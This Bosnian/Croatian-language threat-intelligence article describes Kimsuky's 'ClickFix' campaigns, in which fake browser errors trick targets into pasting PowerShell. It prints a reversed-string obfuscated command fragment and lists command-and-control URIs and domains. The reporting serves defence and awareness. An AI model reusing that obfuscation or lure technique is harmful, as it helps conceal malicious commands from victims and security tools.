Zlonamjerna grupa Kimsuky, poznata po operacijama koje je podržavala Sjeverna Koreja, primijenila je novu, sofisticiranu metodu društvenog inženjeringa nazvanu “ClickFix” kako bi navela korisnike da na vlastitim sistemima pokrenu zlonamjerne skripte. Ova tehnika, prvi put otkrivena od strane istraživača iz Proofpointa u aprilu 2024. godine, uspješno obmanjuje žrtve navodeći ih da vjeruju kako moraju riješiti probleme s preglednikom ili potvrditi sigurnosne dokumente, čime nesvjesno sudjeluju u vlastitom kompromitovanju putem ručnog izvršavanja koda.
ClickFix predstavlja značajan napredak u psihološkom manipulisanju jer prikriva zlonamjerne naredbe kao legitimne procedure za rješavanje problema. Žrtve se suočavaju s lažnim porukama o greškama koje izgledaju kao da potiču od pouzdanih izvora, poput Google Chromea, te ih navode da kopiraju i lijepe naizgled bezazlen kod u konzole PowerShell. Ovaj pristup efikasno zaobilazi tradicionalne sigurnosne mjere jer iskorištava ljudsko ponašanje, a ne tehničke ranjivosti, što znatno otežava otkrivanje za standardne sisteme za zaštitu krajnjih tačaka.
Analitičari kompanije Genians zabilježili su brojne napadačke kampanje tokom 2025. godine u kojima su operativci Kimsuky uspješno primijenili ClickFix taktiku protiv visokovrijednih meta u Južnoj Koreji. Istraživači su primijetili da grupa cilja stručnjake za diplomatiju i nacionalnu sigurnost putem sofisticiranih operacija ciljanog phishinga, demonstrirajući time efikasnost ove tehnike u zaobilaženju sistema za zaštitu krajnjih tačaka.
Kampanje su evoluirale od jednostavnih napada zasnovanih na VBS skriptama do složenijih implementacija u PowerShellu, pokazujući kontinuirano prilagođavanje odbrambenim mjerama. Nedavna istraživanja su otkrila da je Kimsuky integrisao ClickFix u svoju tekuću operaciju “BabyShark”, koristeći uputstva na više jezika, uključujući engleski, francuski, njemački, japanski, korejski, ruski i kineski. Napadači se pretvaraju u legitimne entitete, kao što su vladini zvaničnici, novinski dopisnici i sigurnosno osoblje, kako bi stekli povjerenje prije isporuke zlonamjernih tereta putem šifriranih arhiva ili obmanjujućih web stranica dizajniranih da imitiraju autentične portale i usluge.
Napredna obskurnost i mehanizmi postojanosti Kimsukyjevih ClickFix implementacija ukazuju na značajno usavršavanje tehnika izbjegavanja usmjerenih na prevazilaženje modernih sigurnosnih rješenja. Zlonamjerni softver koristi obskurnost nizova u obrnutom redoslijedu kako bi sakrio zlonamjerne PowerShell komande, čineći vizualni pregled gotovo nemogućim, a istovremeno zadržavajući punu sposobnost izvršavanja. Tipična obskurna struktura komande izgleda ovako: `$value=”tixe&”‘atad-mrof/trapitlum’ epyTtnetnoC-” $req_value=-join $value.ToCharArray()[-1..-$value. Length]; cmd /c $req_value;exit;`. Ova tehnika pohranjuje zlonamjernu funkcionalnost u obrnutim nizovima koji se zatim rekonstruišu tokom izvođenja putem funkcija manipulacije nizovima karaktera PowerShell-a. Zlonamjerni softver dodatno zamagljuje svoje operacije umetanjem nasumičnih numeričkih sekvenci, kao što je “7539518426”, kroz strukture komandi, koristeći izvorne funkcije za zamjenu nizova Windowsa za uklanjanje ovih oznaka tokom izvršavanja, efektivno stvarajući dinamički proces dešifriranja.
Nakon uspješnog raspoređivanja, zlonamjerni softver uspostavlja postojanost kreiranjem zakazanih zadataka i održava komunikaciju sa komandno-kontrolnim serverima koristeći prepoznatljive obrasce URI-ja, uključujući “demo.php?ccs=cin” i “demo.php?ccs=cout”. Infrastruktura se prostire kroz više zemalja i koristi dinamičke DNS usluge, pri čemu nedavne kampanje komuniciraju putem domena kao što su konamo.xyz i raedom.store. Dosljedni identifikator verzije “Version:RE4T-GT7J-KJ90-JB6F-VG5F” koji je zabilježen kroz kampanje potvrđuje povezanost s Kimsukyjevom širim “BabyShark” operacijom.
